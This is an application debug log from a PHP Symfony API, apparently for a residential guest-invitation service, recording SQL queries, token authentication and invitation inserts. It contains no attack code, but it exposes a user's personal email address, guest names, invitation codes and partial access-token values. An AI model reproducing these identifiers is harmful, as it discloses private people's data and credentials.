  6090. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  6091. [2025-12-20 01:13:53] doctrine.DEBUG: "START TRANSACTION" [] []
  6092. [2025-12-20 01:13:53] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"24b6c14d-9861-4702-a438-df [...]","2":1,"3":"2025-12-20 01:13:53","4":"2025-12-20 01:13:53","5":"Manuel","6":"Fonz","7":"749797","8":"/invitation/e09b82b6c5d978 [...]","9":"1","10":null,"11":"2025-12-20 01:13:00","12":null,"13":null,"14":null,"15":274,"16":398} []
  6093. [2025-12-20 01:13:53] doctrine.DEBUG: "COMMIT" [] []
  6094. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6095. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  6096. [2025-12-20 01:13:53] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6097. [2025-12-20 01:13:53] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  6098. [2025-12-20 01:13:53] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  6099. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6100. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6101. [2025-12-20 01:13:53] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  6102. [2025-12-20 01:13:53] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  6103. [2025-12-20 01:13:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6104. [2025-12-20 01:13:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6105. [2025-12-20 01:13:53] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6106. [2025-12-20 01:13:53] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6107. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6108. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6109. [2025-12-20 01:13:53] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6110. [2025-12-20 01:13:53] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6111. [2025-12-20 01:13:53] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6112. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6113. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  6114. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6115. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  6116. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  6117. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  6118. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6119. [2025-12-20 01:13:53] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6120. [2025-12-20 01:14:11] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  6121. [2025-12-20 01:14:11] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  6122. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6123. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6124. [2025-12-20 01:14:11] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  6125. [2025-12-20 01:14:11] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  6126. [2025-12-20 01:14:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6127. [2025-12-20 01:14:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6128. [2025-12-20 01:14:11] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6129. [2025-12-20 01:14:11] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6130. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6131. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6132. [2025-12-20 01:14:11] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6133. [2025-12-20 01:14:11] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6134. [2025-12-20 01:14:11] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6135. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6136. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  6137. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  6138. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6139. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  6140. [2025-12-20 01:14:11] doctrine.DEBUG: "START TRANSACTION" [] []
  6141. [2025-12-20 01:14:11] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"6763eb0f-d519-4cd2-a06a-0c [...]","2":1,"3":"2025-12-20 01:14:11","4":"2025-12-20 01:14:11","5":"Pedro","6":"Fonz","7":"157074","8":"/invitation/57cf45e2c81cc4 [...]","9":"1","10":null,"11":"2025-12-20 01:14:00","12":null,"13":null,"14":null,"15":274,"16":398} []
  6142. [2025-12-20 01:14:11] doctrine.DEBUG: "COMMIT" [] []
  6143. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6144. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  6145. [2025-12-20 01:14:11] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6146. [2025-12-20 01:14:11] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  6147. [2025-12-20 01:14:11] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  6148. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6149. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6150. [2025-12-20 01:14:11] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  6151. [2025-12-20 01:14:11] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  6152. [2025-12-20 01:14:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6153. [2025-12-20 01:14:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6154. [2025-12-20 01:14:11] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6155. [2025-12-20 01:14:11] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6156. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6157. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6158. [2025-12-20 01:14:11] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6159. [2025-12-20 01:14:11] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6160. [2025-12-20 01:14:11] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6161. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6162. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  6163. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6164. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  6165. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  6166. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  6167. [2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6168. [2025-12-20 01:14:11] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6169. [2025-12-20 01:14:25] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  6170. [2025-12-20 01:14:25] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  6171. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6172. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6173. [2025-12-20 01:14:25] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  6174. [2025-12-20 01:14:25] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  6175. [2025-12-20 01:14:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6176. [2025-12-20 01:14:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6177. [2025-12-20 01:14:25] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6178. [2025-12-20 01:14:25] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6179. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6180. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6181. [2025-12-20 01:14:25] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6182. [2025-12-20 01:14:25] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6183. [2025-12-20 01:14:25] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6184. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6185. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
